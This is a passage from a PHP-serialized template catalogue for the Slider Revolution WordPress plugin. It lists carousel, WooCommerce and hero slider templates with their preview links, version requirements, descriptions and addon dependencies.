Template\";s:5:\"alias\";s:29:\"food-recipe-carousel-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:29:\"food-recipe-carousel-template\";s:3:\"img\";s:50:\"packages/food-recipe-carousel-template-package.jpg\";s:7:\"preview\";s:64:\"https://www.sliderrevolution.com/templates/food-recipe-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Showcase your cooking recipes with the easy to use \"Food Recipe Carousel\" template. Clicking the titles opens up a detail view!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Food Recipe Carousel Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"42\";s:9:\"installed\";b:0;}i:503;a:25:{s:2:\"id\";s:3:\"537\";s:5:\"title\";s:27:\"Corporate Carousel Template\";s:5:\"alias\";s:27:\"corporate-carousel-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"corporate-carousel-template\";s:3:\"img\";s:38:\"packages/corporate_carousel_bundle.jpg\";s:7:\"preview\";s:75:\"https://www.sliderrevolution.com/templates/corporate-carousel-with-lightbox\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Corporate Carousel is a basic, easy to use carousel with tab navigation. The lightbox modal can show any additonal content, independant of the carousel.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 15:14:10\";s:7:\"package\";s:27:\"Corporate Carousel Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"43\";s:9:\"installed\";b:0;}i:504;a:25:{s:2:\"id\";s:3:\"538\";s:5:\"title\";s:18:\"Corporate Carousel\";s:5:\"alias\";s:18:\"corporate-carousel\";s:3:\"zip\";s:28:\"packs/corporate-carousel.zip\";s:3:\"uid\";s:32:\"30dea0e333913cb5ebbf8dded8c3a839\";s:3:\"img\";s:29:\"corporate-carousel/slide1.jpg\";s:7:\"preview\";s:34:\"https://revolution.themepunch.com/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Corporate Carousel is a basic, easy to use carousel with tab navigation. The lightbox modal can show any additonal content, independant of the carousel.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 15:26:51\";s:7:\"package\";s:27:\"Corporate Carousel Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"43\";s:9:\"installed\";b:0;}i:505;a:25:{s:2:\"id\";s:3:\"539\";s:5:\"title\";s:18:\"Corporate Lightbox\";s:5:\"alias\";s:18:\"corporate-lightbox\";s:3:\"zip\";s:28:\"packs/corporate-lightbox.zip\";s:3:\"uid\";s:32:\"832c277bfc5a288c0dffd784e4041265\";s:3:\"img\";s:29:\"corporate-lightbox/slide1.jpg\";s:7:\"preview\";s:34:\"https://revolution.themepunch.com/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Corporate Carousel is a basic, easy to use carousel with tab navigation. The lightbox modal can show any additonal content, independant of the carousel.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 15:34:36\";s:7:\"package\";s:27:\"Corporate Carousel Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"43\";s:9:\"installed\";b:0;}i:506;a:25:{s:2:\"id\";s:3:\"540\";s:5:\"title\";s:23:\"Cyber Carousel Template\";s:5:\"alias\";s:23:\"cyber-carousel-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:23:\"cyber-carousel-template\";s:3:\"img\";s:33:\"packages/cybercarousel_bundle.jpg\";s:7:\"preview\";s:71:\"https://www.sliderrevolution.com/templates/cyber-carousel-with-lightbox\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:218:\"<span class=\"ttm_content\">This fullscreen carousel has easy to edit content and vertical navigation tabs. The highlight color can be changed with one click upon opening the editor.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 15:40:25\";s:7:\"package\";s:23:\"Cyber Carousel Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"44\";s:9:\"installed\";b:0;}i:507;a:26:{s:2:\"id\";s:3:\"541\";s:5:\"title\";s:14:\"Cyber Carousel\";s:5:\"alias\";s:14:\"cyber-carousel\";s:3:\"zip\";s:24:\"packs/cyber-carousel.zip\";s:3:\"uid\";s:32:\"b5ef41c7f498bd1dccf8224bfbade718\";s:3:\"img\";s:25:\"cyber-carousel/slide1.jpg\";s:7:\"preview\";s:71:\"https://www.sliderrevolution.com/templates/cyber-carousel-with-lightbox\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:218:\"<span class=\"ttm_content\">This fullscreen carousel has easy to edit content and vertical navigation tabs. The highlight color can be changed with one click upon opening the editor.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 15:42:44\";s:7:\"package\";s:23:\"Cyber Carousel Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"44\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:508;a:25:{s:2:\"id\";s:3:\"542\";s:5:\"title\";s:23:\"Cyber Carousel Lightbox\";s:5:\"alias\";s:23:\"cyber-carousel-lightbox\";s:3:\"zip\";s:33:\"packs/cyber-carousel-lightbox.zip\";s:3:\"uid\";s:32:\"cb91abeed0555dfcafe849c37e7c9c32\";s:3:\"img\";s:34:\"cyber-carousel-lightbox/slide1.jpg\";s:7:\"preview\";s:71:\"https://www.sliderrevolution.com/templates/cyber-carousel-with-lightbox\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:218:\"<span class=\"ttm_content\">This fullscreen carousel has easy to edit content and vertical navigation tabs. The highlight color can be changed with one click upon opening the editor.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 15:50:15\";s:7:\"package\";s:23:\"Cyber Carousel Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"44\";s:9:\"installed\";b:0;}i:509;a:25:{s:2:\"id\";s:3:\"543\";s:5:\"title\";s:16:\"Woo Carousel One\";s:5:\"alias\";s:24:\"woocommerce-carousel-one\";s:3:\"zip\";s:28:\"woocommerce-carousel-one.zip\";s:3:\"uid\";s:32:\"df0a99cef3981ecb608dff4ed573a493\";s:3:\"img\";s:35:\"woocommerce-carousel-one/slide1.jpg\";s:7:\"preview\";s:67:\"https://www.sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:185:\"<span class=\"ttm_content\">A basic WooCommerce carousel. Just set your categories and the carousel will be populated with your WooCommerce products.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 16:02:45\";s:7:\"package\";s:15:\"Woo Slider Pack\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"45\";s:9:\"installed\";b:0;}i:510;a:25:{s:2:\"id\";s:3:\"544\";s:5:\"title\";s:23:\"Woo Carousel One Static\";s:5:\"alias\";s:31:\"woocommerce-carousel-one-static\";s:3:\"zip\";s:35:\"woocommerce-carousel-one-static.zip\";s:3:\"uid\";s:32:\"5c955a3850369e79b1e18921306ac1df\";s:3:\"img\";s:42:\"woocommerce-carousel-one-static/slide1.jpg\";s:7:\"preview\";s:63:\"https://sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A static content carousel. Please use the \"non-static\" version for WooCommerce.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 16:05:02\";s:7:\"package\";s:22:\"Woo Slider Pack Static\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"46\";s:9:\"installed\";b:0;}i:511;a:25:{s:2:\"id\";s:3:\"545\";s:5:\"title\";s:16:\"Woo Carousel Two\";s:5:\"alias\";s:24:\"woocommerce-carousel-two\";s:3:\"zip\";s:28:\"woocommerce-carousel-two.zip\";s:3:\"uid\";s:32:\"fdd797d8e98a9138f5563b68b95ebe1c\";s:3:\"img\";s:35:\"woocommerce-carousel-two/slide1.jpg\";s:7:\"preview\";s:67:\"https://www.sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:185:\"<span class=\"ttm_content\">A basic WooCommerce carousel. Just set your categories and the carousel will be populated with your WooCommerce products.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 16:06:57\";s:7:\"package\";s:15:\"Woo Slider Pack\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"45\";s:9:\"installed\";b:0;}i:512;a:25:{s:2:\"id\";s:3:\"546\";s:5:\"title\";s:23:\"Woo Carousel Two Static\";s:5:\"alias\";s:31:\"woocommerce-carousel-two-static\";s:3:\"zip\";s:35:\"woocommerce-carousel-two-static.zip\";s:3:\"uid\";s:32:\"2f3bfb1dfa99647426ce906f10dfc480\";s:3:\"img\";s:42:\"woocommerce-carousel-two-static/slide1.jpg\";s:7:\"preview\";s:63:\"https://sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A static content carousel. Please use the \"non-static\" version for WooCommerce.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 16:16:15\";s:7:\"package\";s:22:\"Woo Slider Pack Static\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"46\";s:9:\"installed\";b:0;}i:513;a:25:{s:2:\"id\";s:3:\"547\";s:5:\"title\";s:18:\"Woo Feature Slider\";s:5:\"alias\";s:26:\"woocommerce-feature-slider\";s:3:\"zip\";s:30:\"woocommerce-feature-slider.zip\";s:3:\"uid\";s:32:\"c8aa1f551065eeffc752f2d8daef6db1\";s:3:\"img\";s:37:\"woocommerce-feature-slider/slide1.jpg\";s:7:\"preview\";s:67:\"https://www.sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:181:\"<span class=\"ttm_content\">A basic WooCommerce slider. Just set your categories and the slider will be populated with your WooCommerce products.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 16:19:13\";s:7:\"package\";s:15:\"Woo Slider Pack\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"45\";s:9:\"installed\";b:0;}i:514;a:25:{s:2:\"id\";s:3:\"548\";s:5:\"title\";s:25:\"Woo Feature Slider Static\";s:5:\"alias\";s:33:\"woocommerce-feature-slider-static\";s:3:\"zip\";s:37:\"woocommerce-feature-slider-static.zip\";s:3:\"uid\";s:32:\"2f29e8fd101c799480152a7911b33ca6\";s:3:\"img\";s:44:\"woocommerce-feature-slider-static/slide1.jpg\";s:7:\"preview\";s:63:\"https://sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:140:\"<span class=\"ttm_content\">A static content slider Please use the \"non-static\" version for WooCommerce.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-19 16:20:57\";s:7:\"package\";s:22:\"Woo Slider Pack Static\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"46\";s:9:\"installed\";b:0;}i:515;a:22:{s:2:\"id\";s:3:\"549\";s:5:\"title\";s:17:\"Woo Liquid Slider\";s:5:\"alias\";s:17:\"woo-liquid-slider\";s:3:\"zip\";s:21:\"woo-liquid-slider.zip\";s:3:\"uid\";s:32:\"9f455f73675a73dbefe820288e994f27\";s:3:\"img\";s:28:\"woo-liquid-slider/slide1.jpg\";s:7:\"preview\";s:68:\"https://www.sliderrevolution.com/templates/woocommerce-liquid-slider\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:236:\"<span class=\"ttm_content\">A WooCommerce slider using the BubbleMorph addon for an interesting liquid effect. Just set your categories and the slider will be populated with your WooCommerce products.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";i:2;s:11:\"woocommerce\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"2021-01-19 16:23:03\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:516;a:22:{s:2:\"id\";s:3:\"550\";s:5:\"title\";s:24:\"Woo Liquid Slider Static\";s:5:\"alias\";s:32:\"woocommerce-liquid-slider-static\";s:3:\"zip\";s:36:\"woocommerce-liquid-slider-static.zip\";s:3:\"uid\";s:32:\"5848192fea46ffee95a91aa531848e19\";s:3:\"img\";s:43:\"woocommerce-liquid-slider-static/slide1.jpg\";s:7:\"preview\";s:68:\"https://www.sliderrevolution.com/templates/woocommerce-liquid-slider\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:203:\"<span class=\"ttm_content\">A static content slider using the BubbleMorph addon for an interesting liquid effect. For WooCommerce, please use the \"non-static\" version.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"2021-01-19 16:24:35\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:517;a:25:{s:2:\"id\";s:3:\"551\";s:5:\"title\";s:15:\"Woo Slider Pack\";s:5:\"alias\";s:15:\"woo-slider-pack\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:15:\"woo-slider-pack\";s:3:\"img\";s:34:\"packages/woosliderpack_dynamic.jpg\";s:7:\"preview\";s:67:\"https://www.sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:181:\"<span class=\"ttm_content\">A basic WooCommerce slider. Just set your categories and the slider will be populated with your WooCommerce products.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:14:\"Slider Package\";s:6:\"filter\";a:4:{i:0;s:8:\"carousel\";i:1;s:6:\"slider\";i:2;s:9:\"postbased\";i:3;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-20 09:34:45\";s:7:\"package\";s:15:\"Woo Slider Pack\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"45\";s:9:\"installed\";b:0;}i:518;a:25:{s:2:\"id\";s:3:\"552\";s:5:\"title\";s:22:\"Woo Slider Pack Static\";s:5:\"alias\";s:22:\"woo-slider-pack-static\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:22:\"woo-slider-pack-static\";s:3:\"img\";s:33:\"packages/woosliderpack_static.jpg\";s:7:\"preview\";s:67:\"https://www.sliderrevolution.com/templates/woocommerce-slider-pack/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:181:\"<span class=\"ttm_content\">A basic WooCommerce slider. Just set your categories and the slider will be populated with your WooCommerce products.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:14:\"Slider Package\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:11:\"woocommerce\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2021-01-20 09:39:21\";s:7:\"package\";s:22:\"Woo Slider Pack Static\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"46\";s:9:\"installed\";b:0;}i:519;a:22:{s:2:\"id\";s:3:\"553\";s:5:\"title\";s:24:\"Creative Hero Collection\";s:5:\"alias\";s:24:\"creative-hero-collection\";s:3:\"zip\";s:28:\"creative-hero-collection.zip\";s:3:\"uid\";s:32:\"e20126d93d081055e5ff3f6981b971fa\";s:3:\"img\";s:35:\"creative-hero-collection/slide1.jpg\";s:7:\"preview\";s:68:\"https://www.sliderrevolution.com/templates/creative-hero-collection/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:245:\"<span class=\"ttm_content\">A fantastic intro presentation for almost any website. If you want to use a single slide as a hero, simply drag it to the first position and set the layout of the module to \"scene\".</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:348:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"2021-02-23 10:22:47\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:520;a:22:{s:2:\"id\";s:3:\"554\";s:5:\"title\";s:12:\"Photo Slider\";s:5:\"alias\";s:19:\"photographer-slider\";s:3:\"zip\";s:23:\"photographer-slider.zip\";s:3:\"uid\";s:32:\"e00104cff231e2aaeb149b3c63e78a5e\";s:3:\"img\";s:30:\"photographer-slider/slide1.jpg\";s:7:\"preview\";s:80:\"https://www.sliderrevolution.com/templates/photographer-and-videographer-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:169:\"<span class=\"ttm_content\">A great module for any photographer/videographer who wants to display their portfolio in an engaging way.</span><span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:174:\"[{\"path\":\"revslider-bubblemorph-addon\\/revslider-bubblemorph-addon.php\",\"name\":\"BubbleMorph AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"2021-02-23 10:25:31\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:521;a:22:{s:2:\"id\";s:3:\"555\";s:5:\"title\";s:18:\"Real Estate Slider\";s:5:\"alias\";s:17:\"realestate-slider\";s:3:\"zip\";s:21:\"realestate-slider.zip\";s:3:\"uid\";s:32:\"596effabfef768f0371cba2b1fdd0c1d\";s:3:\"img\";s:28:\"realestate-slider/slide1.jpg\";s:7:\"preview\";s:71:\"https://www.sliderrevolution.com/templates/real-estate-showcase-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:152:\"<span class=\"ttm_content\">Showcase your clients real estate offerings with this clean and convincing presentation.</span><span 